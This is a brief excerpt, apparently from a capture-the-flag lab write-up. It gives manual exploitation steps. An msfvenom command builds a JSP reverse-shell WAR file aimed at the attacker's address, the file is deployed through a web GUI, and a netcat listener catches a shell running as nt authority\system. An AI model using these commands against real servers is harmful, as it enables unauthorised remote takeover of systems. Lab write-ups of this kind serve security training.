4 manual
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 -f war -o shell.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes
Saved as: shell.war
Upload using GUI
and click on it to deploy
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
whoami
whoami
nt authority\system
Last updated